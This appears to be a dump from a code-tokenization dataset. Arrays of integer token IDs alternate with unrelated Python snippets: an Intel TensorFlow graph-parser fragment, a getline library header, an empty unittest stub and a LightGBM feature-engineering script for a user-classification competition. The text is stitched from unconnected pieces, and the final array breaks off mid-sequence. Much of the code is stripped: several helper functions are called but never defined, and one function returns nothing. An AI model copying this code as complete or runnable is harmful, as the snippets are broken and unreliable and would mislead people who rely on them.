5892, 68, 12, 2919, 657, 13, 10535, 830, 68, 10, 405, 39937, 8054, 17672, 220, 220, 220, 220, 220, 220, 220, 220, 220, 20460, 36230, 23929, 49, 220, 220, 220, 220, 198, 8763, 3843, 220, 860, 13, 25838, 18182, 22, 39997, 68, 12, 940, 657, 13, 10535, 830, 68, 10, 405, 39937, 8054, 17672, 220, 220, 220, 220, 220, 220, 220, 220, 220, 20460, 36230, 23929, 49, 220, 220, 220, 220, 198, 38, 6968, 32, 220, 352, 13, 405, 26200, 2481, 33042, 68, 12, 2919, 513, 13, 26073, 36657, 2998, 19, 68, 12, 1415, 46393, 830, 17672, 220, 220, 220, 220, 220, 220, 220, 220, 220, 20460, 36230, 23929, 49, 220, 220, 220, 220, 198, 16960, 3843, 220, 860, 13, 25838, 18182, 22, 39997, 68, 12, 940, 352, 13, 39509, 2327, 3104, 2670, 68, 12, 1314, 7618, 4089, 1731, 17672, 220, 220, 220, 220, 220, 220, 220, 220, 220, 20460, 36230, 23929, 49, 220, 220, 220, 220, 198, 48, 57, 3843, 220, 718, 13, 47785, 1495, 1795, 22047, 68, 12, 2931, 657, 13, 10535, 830, 68, 10, 405, 220, 220, 807, 17477, 19322, 220, 220, 220, 220, 220, 220, 220, 220, 220, 20460, 36230, 23929, 49, 220, 220, 220, 220, 198, 220, 220, 220, 1248, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 12509, 2969, 10729, 1340, 5258, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 23578, 3963, 39837, 1137, 220, 220, 220, 220, 220, 220, 220, 198, 38, 486, 2177, 7769, 8487, 3571, 3571, 3571, 642, 13, 38612, 20370, 20964, 36625, 68, 12, 2713, 12, 19, 13, 20, 2857, 2857, 14877, 3459, 2996, 68, 12, 1485, 657, 13, 8269, 2388, 68, 10, 405, 198, 220, 220, 220, 220, 767, 13, 2167, 10535, 830, 68, 10, 486, 12, 17, 13, 46435, 11623, 10535, 68, 10, 486, 604, 13, 3459, 26514, 2780, 3553, 33372, 68, 12, 2931, 12, 17, 13, 26895, 2931, 19924, 1795, 2996, 68, 12, 486, 198, 220, 220, 220, 532, 16, 13, 1954, 22996, 940, 3459, 3720, 16, 68, 12, 3312, 767, 13, 2999, 14454, 2231, 38605, 3134, 68, 12, 3070, 362, 13, 22, 3459, 2718, 5607, 3459, 28771, 68, 12, 3312, 642, 13, 1314, 2623, 4790, 1270, 4524, 1129, 68, 10, 3070, 198, 220, 220, 220, 220, 604, 13, 18, 2167, 8269, 68, 10, 2713, 767, 13, 23, 1954, 940, 4846, 25674, 2154, 68, 12, 2919, 362, 13, 486, 16315, 2078, 3695, 20986, 68, 10, 405, 604, 13, 2078, 26200, 2548, 3559, 25667, 68, 12, 2919, 198, 220, 220, 220, 220, 860, 13, 3104, 1507, 3104, 3388, 1065, 2998, 68, 12, 486, 513, 13, 3132, 8269, 405, 68, 10, 2999, 718, 13, 1129, 1731, 4531, 2920, 3324, 486, 68, 12, 486, 12, 23, 13, 3553, 31980, 1314, 17059, 1433, 68, 12, 2931, 198, 220, 220, 220, 532, 17, 13, 4059, 13464, 20219, 34770, 68, 12, 1157, 352, 13, 8269, 2388, 68, 10, 405, 352, 13, 24, 2996, 10535, 830, 68, 10, 3070, 657, 13, 8269, 2388, 68, 10, 405, 198, 220, 220, 220, 220, 362, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 642, 13, 3365, 3720, 2327, 34825, 48528, 68, 12, 2931, 767, 13, 2167, 10535, 830, 68, 10, 486, 198, 220, 220, 220, 220, 604, 13, 23045, 1507, 24598, 68, 10, 2713, 604, 13, 8269, 2388, 68, 10, 405, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 198, 50, 1238, 2177, 7769, 8487, 3571, 1467, 3933, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 604, 13, 2091, 11245, 24598, 68, 10, 2713, 198, 220, 220, 220, 220, 604, 13, 3312, 27824, 2167, 2388, 68, 10, 3023, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 352, 13, 8269, 2388, 68, 10, 405, 198, 220, 220, 220, 532, 16, 13, 1065, 33459, 1433, 20483, 68, 10, 3023, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 513, 13, 1983, 3134, 8269, 68, 10, 3023, 198, 220, 220, 220, 220, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 362, 13, 1314, 8269, 405, 68, 10, 2999, 198, 7061, 6, 198, 198, 62, 28341, 62, 11299, 62, 85, 18, 62, 13271, 9741, 796, 705, 7061, 59, 198, 220, 220, 220, 220, 513, 13, 3070, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 47140, 3528, 6234, 42865, 220, 220, 220, 220, 337, 357, 44, 2966, 8, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 371, 1268, 6369, 44156, 2849, 1220, 41876, 198, 2749, 32779, 469, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 369, 2188, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 580, 31495, 2931, 5534, 1959, 2999, 16987, 350, 15548, 1220, 32494, 11050, 1220, 360, 6158, 220, 198, 220, 220, 220, 1248, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 12509, 2969, 10729, 1340, 5258, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 23578, 3963, 39837, 1137, 220, 220, 220, 220, 220, 220, 220, 198, 50, 1238, 2177, 7769, 8487, 3571, 8870, 6740, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 604, 13, 18, 24940, 2167, 20483, 68, 10, 2713, 198, 220, 220, 220, 220, 604, 13, 3312, 27824, 2167, 2388, 68, 10, 3023, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 352, 13, 8269, 2388, 68, 10, 405, 198, 220, 220, 220, 532, 16, 13, 1065, 33459, 1433, 20483, 68, 10, 3023, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 513, 13, 1983, 3134, 8269, 68, 10, 3023, 198, 220, 220, 220, 220, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 362, 13, 2167, 10535, 830, 68, 10, 486, 198, 50, 1238, 2177, 7769, 8487, 3571, 3571, 3933, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 604, 13, 19504, 3901, 24598, 68, 10, 2713, 198, 220, 220, 220, 220, 604, 13, 3312, 27824, 2167, 2388, 68, 10, 3023, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 352, 13, 8269, 2388, 68, 10, 405, 198, 220, 220, 220, 532, 16, 13, 1065, 33459, 1433, 20483, 68, 10, 3023, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 513, 13, 1983, 3134, 8269, 68, 10, 3023, 198, 220, 220, 220, 220, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 362, 13, 8269, 2388, 68, 10, 405, 198, 50, 1238, 2177, 7769, 8487, 3571, 7643, 1105, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 604, 13, 37283, 10535, 830, 68, 10, 2713, 198, 220, 220, 220, 220, 604, 13, 3312, 27824, 2167, 2388, 68, 10, 3023, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 352, 13, 8269, 2388, 68, 10, 405, 198, 220, 220, 220, 532, 16, 13, 1065, 33459, 1433, 20483, 68, 10, 3023, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 513, 13, 1983, 3134, 8269, 68, 10, 3023, 198, 220, 220, 220, 220, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 657, 13, 8269, 2388, 68, 10, 405, 352, 13, 2167, 10535, 830, 68, 10, 486, 198, 7061, 6, 628, 198, 31, 9078, 9288, 13, 69, 9602, 628, 198, 31, 9078, 9288, 13, 69, 9602, 628, 198, 31, 9078, 9288, 13, 69, 9602, 628, 198, 31, 9078, 9288, 13, 69, 9602, 628, 198, 31, 9078, 9288, 13, 69, 9602, 198 ]
1.844309
2,961
# Copyright 2017 Intel Corporation. # The source code, information and material ("Material") contained herein is # owned by Intel Corporation or its suppliers or licensors, and title to such # Material remains with Intel Corporation or its suppliers or licensors. # The Material contains proprietary information of Intel or its suppliers and # licensors. The Material is protected by worldwide copyright laws and treaty # provisions. # No part of the Material may be used, copied, reproduced, modified, published, # uploaded, posted, transmitted, distributed or disclosed in any way without # Intel's prior express written permission. No license under any patent, # copyright or other intellectual property rights in the Material is granted to # or conferred upon you, either expressly, by implication, inducement, estoppel # or otherwise. # Any license under such intellectual property rights must be express and # approved by Intel in writing. import sys import tensorflow as tf import google.protobuf as proto import numpy as np import math import re from Models.Network import * from Models.NetworkStage import * from Models.EnumDeclarations import * from tensorflow.core.framework import graph_pb2 from tensorflow.python.framework import ops from Controllers.TensorFlowPreproc import TFPreprocessor from Controllers.TensorFlowPreproc import PatternType sys.setrecursionlimit(5000) placeholder_dict = {} const_dict = {} node_dict = {} variable_dict = {} concat_tracker = [] reshape_tracker = [] identity_tracker = [] padding_tracker = [] inputnode = 'input' os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2" def same_padding(in_dim, kernel_dim, stride_dim): """ Calculates the output dimension and also the padding required for that dimension. :param in_dim: Width/Height of Input :param kernel_dim: Width/Height of Kernel :param stride_dim: Vertical/Horizontal Stride """ output_dim = math.ceil(float(in_dim) / float(stride_dim)) pad = ((output_dim - 1) * stride_dim + kernel_dim - in_dim) / 2 return output_dim, pad def get_deconv_padding(input_shape, output_shape, kernel_shape, stride): """ input_shape: N,H,W,C output_shape: N,H,W,C kernel_shape: kh,kw stride: 1,sh,sw,sc """ pady = 0 padx = 0 # 2Xpad = stride X (input - 1) + kernel - out pady = stride[1] * (input_shape[1] - 1) + kernel_shape[0] - output_shape[1] padx = stride[2] * (input_shape[2] - 1) + kernel_shape[1] - output_shape[2] if (pady % 2 == 1): pady = -1 else: pady = pady / 2 if (padx % 2 == 1): padx = -1 else: padx = padx / 2 return int(pady), int(padx) # Count how many times we need this as an input
[ 2, 15069, 2177, 8180, 10501, 13, 198, 2, 383, 2723, 2438, 11, 1321, 290, 2587, 5855, 17518, 4943, 7763, 24028, 318, 198, 2, 6898, 416, 8180, 10501, 393, 663, 20499, 393, 8240, 669, 11, 290, 3670, 284, 884, 198, 2, 14633, 3793, 351, 8180, 10501, 393, 663, 20499, 393, 8240, 669, 13, 198, 2, 383, 14633, 4909, 20622, 1321, 286, 8180, 393, 663, 20499, 290, 198, 2, 8240, 669, 13, 383, 14633, 318, 6861, 416, 8688, 6634, 3657, 290, 15775, 198, 2, 8617, 13, 198, 2, 1400, 636, 286, 262, 14633, 743, 307, 973, 11, 18984, 11, 31759, 11, 9518, 11, 3199, 11, 198, 2, 19144, 11, 4481, 11, 18307, 11, 9387, 393, 16404, 287, 597, 835, 1231, 198, 2, 8180, 338, 3161, 4911, 3194, 7170, 13, 1400, 5964, 739, 597, 12701, 11, 198, 2, 6634, 393, 584, 9028, 3119, 2489, 287, 262, 14633, 318, 7520, 284, 198, 2, 393, 39376, 2402, 345, 11, 2035, 27462, 11, 416, 26863, 11, 21155, 434, 11, 1556, 10365, 417, 198, 2, 393, 4306, 13, 198, 2, 4377, 5964, 739, 884, 9028, 3119, 2489, 1276, 307, 4911, 290, 198, 2, 6325, 416, 8180, 287, 3597, 13, 198, 198, 11748, 25064, 198, 11748, 11192, 273, 11125, 355, 48700, 198, 11748, 23645, 13, 11235, 672, 3046, 355, 44876, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 10688, 198, 11748, 302, 198, 6738, 32329, 13, 26245, 1330, 1635, 198, 6738, 32329, 13, 26245, 29391, 1330, 1635, 198, 6738, 32329, 13, 4834, 388, 37835, 24355, 1330, 1635, 198, 6738, 11192, 273, 11125, 13, 7295, 13, 30604, 1330, 4823, 62, 40842, 17, 198, 6738, 11192, 273, 11125, 13, 29412, 13, 30604, 1330, 39628, 198, 6738, 2345, 36667, 13, 51, 22854, 37535, 6719, 36942, 1330, 309, 5837, 260, 41341, 198, 6738, 2345, 36667, 13, 51, 22854, 37535, 6719, 36942, 1330, 23939, 6030, 198, 198, 17597, 13, 2617, 8344, 24197, 32374, 7, 27641, 8, 198, 5372, 13829, 62, 11600, 796, 23884, 198, 9979, 62, 11600, 796, 23884, 198, 17440, 62, 11600, 796, 23884, 198, 45286, 62, 11600, 796, 23884, 198, 1102, 9246, 62, 2213, 10735, 796, 17635, 198, 3447, 1758, 62, 2213, 10735, 796, 17635, 198, 738, 414, 62, 2213, 10735, 796, 17635, 198, 39231, 62, 2213, 10735, 796, 17635, 198, 15414, 17440, 796, 705, 15414, 6, 198, 198, 418, 13, 268, 2268, 14692, 10234, 62, 8697, 47, 62, 23678, 62, 25294, 62, 2538, 18697, 8973, 796, 366, 17, 1, 628, 198, 198, 4299, 976, 62, 39231, 7, 259, 62, 27740, 11, 9720, 62, 27740, 11, 33769, 62, 27740, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 27131, 689, 262, 5072, 15793, 290, 635, 262, 24511, 2672, 329, 326, 15793, 13, 198, 220, 220, 220, 1058, 17143, 287, 62, 27740, 25, 38807, 14, 23106, 286, 23412, 198, 220, 220, 220, 1058, 17143, 9720, 62, 27740, 25, 38807, 14, 23106, 286, 32169, 198, 220, 220, 220, 1058, 17143, 33769, 62, 27740, 25, 38937, 14, 27991, 38342, 4285, 485, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 5072, 62, 27740, 796, 10688, 13, 344, 346, 7, 22468, 7, 259, 62, 27740, 8, 1220, 12178, 7, 2536, 485, 62, 27740, 4008, 198, 220, 220, 220, 14841, 796, 14808, 22915, 62, 27740, 532, 352, 8, 1635, 33769, 62, 27740, 1343, 9720, 62, 27740, 532, 287, 62, 27740, 8, 1220, 362, 198, 220, 220, 220, 1441, 5072, 62, 27740, 11, 14841, 628, 198, 4299, 651, 62, 12501, 261, 85, 62, 39231, 7, 15414, 62, 43358, 11, 5072, 62, 43358, 11, 9720, 62, 43358, 11, 33769, 2599, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 5128, 62, 43358, 25, 399, 11, 39, 11, 54, 11, 34, 198, 220, 220, 220, 5072, 62, 43358, 25, 399, 11, 39, 11, 54, 11, 34, 198, 220, 220, 220, 9720, 62, 43358, 25, 44081, 11, 46265, 198, 220, 220, 220, 33769, 25, 352, 11, 1477, 11, 2032, 11, 1416, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 279, 4597, 796, 657, 198, 220, 220, 220, 14841, 87, 796, 657, 198, 220, 220, 220, 1303, 362, 55, 15636, 796, 33769, 1395, 357, 15414, 532, 352, 8, 1343, 9720, 532, 503, 198, 220, 220, 220, 279, 4597, 796, 33769, 58, 16, 60, 1635, 357, 15414, 62, 43358, 58, 16, 60, 532, 352, 8, 1343, 9720, 62, 43358, 58, 15, 60, 532, 5072, 62, 43358, 58, 16, 60, 198, 220, 220, 220, 14841, 87, 796, 33769, 58, 17, 60, 1635, 357, 15414, 62, 43358, 58, 17, 60, 532, 352, 8, 1343, 9720, 62, 43358, 58, 16, 60, 532, 5072, 62, 43358, 58, 17, 60, 198, 220, 220, 220, 611, 357, 79, 4597, 4064, 362, 6624, 352, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 279, 4597, 796, 532, 16, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 279, 4597, 796, 279, 4597, 1220, 362, 198, 220, 220, 220, 611, 357, 15636, 87, 4064, 362, 6624, 352, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 14841, 87, 796, 532, 16, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 14841, 87, 796, 14841, 87, 1220, 362, 198, 220, 220, 220, 1441, 493, 7, 79, 4597, 828, 493, 7, 15636, 87, 8, 628, 628, 198, 198, 2, 2764, 703, 867, 1661, 356, 761, 428, 355, 281, 5128, 198 ]
3.0875
880
''' Getline - A library to get text from the console Author: Tim Henderson Contact: [email protected] Copyright (c) 2010 All Rights Reserved. Licensed under a BSD style license see the LICENSE file. File: __linux_impl Purpose: The linux implementation of getline '''
[ 7061, 6, 198, 3855, 1370, 532, 317, 5888, 284, 651, 2420, 422, 262, 8624, 198, 13838, 25, 5045, 22016, 198, 17829, 25, 4628, 13, 83, 24411, 31, 31153, 400, 1435, 13, 785, 198, 15269, 357, 66, 8, 3050, 1439, 6923, 33876, 13, 198, 26656, 15385, 739, 257, 347, 10305, 3918, 5964, 766, 262, 38559, 24290, 2393, 13, 198, 198, 8979, 25, 11593, 23289, 62, 23928, 198, 30026, 3455, 25, 383, 32639, 7822, 286, 651, 1370, 198, 7061, 6, 198 ]
3.481013
79
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import unittest def first_negative_index(): """ Returns the index of the first negative element in a given list of numbers. """ return if __name__ == "__main__": unittest.main()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 555, 715, 395, 628, 198, 4299, 717, 62, 31591, 62, 9630, 33529, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 16409, 262, 6376, 286, 262, 717, 4633, 5002, 287, 257, 1813, 1351, 286, 3146, 13, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 1441, 628, 198, 198, 361, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 198, 220, 220, 220, 555, 715, 395, 13, 12417, 3419, 198 ]
2.614583
96
# coding: utf-8 from __future__ import division import numpy as np import pandas as pd from sklearn import metrics import lightgbm as lgb import time from multiprocessing import cpu_count import warnings warnings.filterwarnings('ignore') # Constants define ROOT_PATH = '../' ONLINE = 1 target = 'label' train_len = 4999 threshold = 0.5 ########################################### Helper function ########################################### ########################################### Read data ########################################### train = pd.read_csv(ROOT_PATH + 'data/input/train/uid_train.txt', header=None, sep='\t') train.columns = ['uid', 'label'] train_voice = pd.read_csv(ROOT_PATH + 'data/input/train/voice_train.txt', header=None, sep='\t') train_voice.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'end_time', 'call_type', 'in_out'] train_sms = pd.read_csv(ROOT_PATH + 'data/input/train/sms_train.txt', header=None, sep='\t') train_sms.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'in_out'] train_wa = pd.read_csv(ROOT_PATH + 'data/input/train/wa_train.txt', header=None, sep='\t') train_wa.columns = ['uid', 'wa_name', 'visit_cnt', 'visit_dura', 'up_flow', 'down_flow', 'wa_type', 'date'] test = pd.DataFrame({'uid': ['u' + str(i) for i in range(5000, 7000)]}) test_voice = pd.read_csv(ROOT_PATH + 'data/input/test_a/voice_test_a.txt', header=None, sep='\t') test_voice.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'end_time', 'call_type', 'in_out'] test_sms = pd.read_csv(ROOT_PATH + 'data/input/test_a/sms_test_a.txt', header=None, sep='\t') test_sms.columns = ['uid', 'opp_num', 'opp_head', 'opp_len', 'start_time', 'in_out'] test_wa = pd.read_csv(ROOT_PATH + 'data/input/test_a/wa_test_a.txt', header=None, sep='\t') test_wa.columns = ['uid', 'wa_name', 'visit_cnt', 'visit_dura', 'up_flow', 'down_flow', 'wa_type', 'date'] df = pd.concat([train, test]).reset_index(drop=True) df_voice = pd.concat([train_voice, test_voice]).reset_index(drop=True) df_sms = pd.concat([train_sms, test_sms]).reset_index(drop=True) df_wa = pd.concat([train_wa, test_wa]).reset_index(drop=True) ########################################### Feature engineer ########################################### predictors = [] df, predictors_tmp = merge_feat_count(df, df_voice, ['uid'], 'count_gb_uid_in_voice'); predictors += predictors_tmp df, predictors_tmp = merge_feat_count(df, df_sms, ['uid'], 'count_gb_uid_in_sms'); predictors += predictors_tmp df, predictors_tmp = merge_feat_count(df, df_wa, ['uid'], 'count_gb_uid_in_wa'); predictors += predictors_tmp df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'opp_len'], 'voice_opp_len'); predictors += predictors_tmp df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'call_type'], 'voice_call_type'); predictors += predictors_tmp df, predictors_tmp = merge_feat_onehot_count(df, df_voice, ['uid', 'in_out'], 'voice_in_out_'); predictors += predictors_tmp df, predictors_tmp = merge_feat_onehot_count(df, df_sms, ['uid', 'opp_len'], 'sms_opp_len'); predictors += predictors_tmp df, predictors_tmp = merge_feat_onehot_count(df, df_sms, ['uid', 'in_out'], 'sms_in_out'); predictors += predictors_tmp df, predictors_tmp = merge_feat_onehot_count(df, df_wa, ['uid', 'wa_type'], 'wa_type'); predictors += predictors_tmp df, predictors_tmp = merge_feat_onehot_count(df, df_wa, ['uid', 'date'], 'wa_date'); predictors += predictors_tmp df, predictors_tmp = merge_feat_nunique(df, df_voice, ['uid'], 'opp_num', 'nunique_oppNum_gb_uid_in_voice'); predictors += predictors_tmp df, predictors_tmp = merge_feat_nunique(df, df_voice, ['uid'], 'opp_head', 'nunique_oppHead_gb_uid_in_voice'); predictors += predictors_tmp df, predictors_tmp = merge_feat_nunique(df, df_sms, ['uid'], 'opp_num', 'nunique_oppNum_gb_uid_in_sms'); predictors += predictors_tmp df, predictors_tmp = merge_feat_nunique(df, df_sms, ['uid'], 'opp_head', 'nunique_oppHead_gb_uid_in_sms'); predictors += predictors_tmp df, predictors_tmp = merge_feat_nunique(df, df_wa, ['uid'], 'wa_name', 'nunique_waName_gb_uid_in_wa'); predictors += predictors_tmp col_list = ['visit_cnt', 'visit_dura', 'up_flow', 'down_flow'] for i in col_list: df, predictors_tmp = merge_feat_min(df, df_wa, ['uid'], i, 'min_%s_gb_uid_in_wa' % i); predictors += predictors_tmp df, predictors_tmp = merge_feat_max(df, df_wa, ['uid'], i, 'max_%s_gb_uid_in_wa' % i); predictors += predictors_tmp df, predictors_tmp = merge_feat_mean(df, df_wa, ['uid'], i, 'mean_%s_gb_uid_in_wa' % i); predictors += predictors_tmp train_x = df.loc[:(train_len - 1), predictors] train_y = df.loc[:(train_len - 1), target] test_x = df.loc[train_len:, predictors] ########################################### LightGBM ########################################### config_lgb = { 'rounds': 10000, 'folds': 5 } params_lgb = { 'boosting_type': 'gbdt', 'objective': 'binary', 'metric': {'auc'}, 'num_leaves': 63, 'learning_rate': 0.06, 'feature_fraction': 0.8, 'bagging_fraction': 0.8, 'bagging_freq': 1, # 'min_sum_hessian_in_leaf': 10, 'verbosity': 5, 'num_threads': cpu_count() - 1, 'seed': 7, } # lgb_cv(train_x, train_y, params_lgb, config_lgb['rounds'], config_lgb['folds']) model_lgb, pred_lgb = lgb_train_predict(train_x, train_y, test_x, params_lgb, 90) result = store_result(test.uid, pred_lgb, threshold, '20180523-lgb-%d-%d(r%d)' % (7742, 9098, 90)) result = store_result(test.uid, pred_lgb, threshold, 'submission') imp = pd.DataFrame({'feature':train_x.columns.values, 'importance':list(model_lgb.feature_importance())}) imp = imp.sort_values(by = 'importance', ascending = False) imp.to_csv(ROOT_PATH + 'data/output/feat_imp/imp-20180523-%d-%d(r%d).csv' % (7700, 9102, 90), index=False)
[ 2, 19617, 25, 3384, 69, 12, 23, 198, 198, 6738, 11593, 37443, 834, 1330, 7297, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 19798, 292, 355, 279, 67, 198, 6738, 1341, 35720, 1330, 20731, 198, 11748, 1657, 70, 20475, 355, 300, 22296, 198, 11748, 640, 198, 6738, 18540, 305, 919, 278, 1330, 42804, 62, 9127, 198, 11748, 14601, 198, 40539, 654, 13, 24455, 40539, 654, 10786, 46430, 11537, 628, 198, 2, 4757, 1187, 8160, 198, 13252, 2394, 62, 34219, 796, 705, 40720, 6, 198, 1340, 24027, 796, 352, 198, 198, 16793, 796, 705, 18242, 6, 198, 27432, 62, 11925, 796, 604, 17032, 198, 400, 10126, 796, 657, 13, 20, 628, 198, 29113, 7804, 21017, 5053, 525, 2163, 1303, 29113, 7804, 2235, 628, 198, 198, 29113, 7804, 21017, 4149, 1366, 1303, 29113, 7804, 2235, 628, 198, 27432, 796, 279, 67, 13, 961, 62, 40664, 7, 13252, 2394, 62, 34219, 1343, 705, 7890, 14, 15414, 14, 27432, 14, 27112, 62, 27432, 13, 14116, 3256, 13639, 28, 14202, 11, 41767, 11639, 59, 83, 11537, 198, 27432, 13, 28665, 82, 796, 37250, 27112, 3256, 705, 18242, 20520, 198, 27432, 62, 38888, 796, 279, 67, 13, 961, 62, 40664, 7, 13252, 2394, 62, 34219, 1343, 705, 7890, 14, 15414, 14, 27432, 14, 38888, 62, 27432, 13, 14116, 3256, 13639, 28, 14202, 11, 41767, 11639, 59, 83, 11537, 198, 27432, 62, 38888, 13, 28665, 82, 796, 37250, 27112, 3256, 705, 10365, 62, 22510, 3256, 705, 10365, 62, 2256, 3256, 705, 10365, 62, 11925, 3256, 705, 9688, 62, 2435, 3256, 705, 437, 62, 2435, 3256, 705, 13345, 62, 4906, 3256, 705, 259, 62, 448, 20520, 198, 27432, 62, 82, 907, 796, 279, 67, 13, 961, 62, 40664, 7, 13252, 2394, 62, 34219, 1343, 705, 7890, 14, 15414, 14, 27432, 14, 82, 907, 62, 27432, 13, 14116, 3256, 13639, 28, 14202, 11, 41767, 11639, 59, 83, 11537, 198, 27432, 62, 82, 907, 13, 28665, 82, 796, 37250, 27112, 3256, 705, 10365, 62, 22510, 3256, 705, 10365, 62, 2256, 3256, 705, 10365, 62, 11925, 3256, 705, 9688, 62, 2435, 3256, 705, 259, 62, 448, 20520, 198, 27432, 62, 10247, 796, 279, 67, 13, 961, 62, 40664, 7, 13252, 2394, 62, 34219, 1343, 705, 7890, 14, 15414, 14, 27432, 14, 10247, 62, 27432, 13, 14116, 3256, 13639, 28, 14202, 11, 41767, 11639, 59, 83, 11537, 198, 27432, 62, 10247, 13, 28665, 82, 796, 37250, 27112, 3256, 705, 10247, 62, 3672, 3256, 705, 4703, 270, 62, 66, 429, 3256, 705, 4703, 270, 62, 67, 5330, 3256, 705, 929, 62, 11125, 3256, 705, 2902, 62, 11125, 3256, 705, 10247, 62, 4906, 3256, 705, 4475, 20520, 198, 198, 9288, 796, 279, 67, 13, 6601, 19778, 15090, 6, 27112, 10354, 37250, 84, 6, 1343, 965, 7, 72, 8, 329, 1312, 287, 2837, 7, 27641, 11, 50205, 15437, 30072, 198, 9288, 62, 38888, 796, 279, 67, 13, 961, 62, 40664, 7, 13252, 2394, 62, 34219, 1343, 705, 7890, 14, 15414, 14, 9288, 62, 64, 14, 38888, 62, 9288, 62, 64, 13, 14116, 3256, 13639, 28, 14202, 11, 41767, 11639, 59, 83, 11537, 198, 9288, 62, 38888, 13, 28665, 82, 796, 37250, 27112, 3256, 705, 10365, 62, 22510, 3256, 705, 10365, 62, 2256, 3256, 705, 10365, 62, 11925, 3256, 705, 9688, 62, 2435, 3256, 705, 437, 62, 2435, 3256, 705, 13345, 62, 4906, 3256, 705, 259, 62, 448, 20520, 198, 9288, 62, 82, 907, 796, 279, 67, 13, 961, 62, 40664, 7, 13252, 2394, 62, 34219, 1343, 705, 7890, 14, 15414, 14, 9288, 62, 64, 14, 82, 907, 62, 9288, 62, 64, 13, 14116, 3256, 13639, 28, 14202, 11, 41767, 11639, 59, 83, 11537, 198, 9288, 62, 82, 907, 13, 28665, 82, 796, 37250, 27112, 3256, 705, 10365, 62, 22510, 3256, 705, 10365, 62, 2256, 3256, 705, 10365, 62, 11925, 3256, 705, 9688, 62, 2435, 3256, 705, 259, 62, 448, 20520, 198, 9288, 62, 10247, 796, 279, 67, 13, 961, 62, 40664, 7, 13252, 2394, 62, 34219, 1343, 705, 7890, 14, 15414, 14, 9288, 62, 64, 14, 10247, 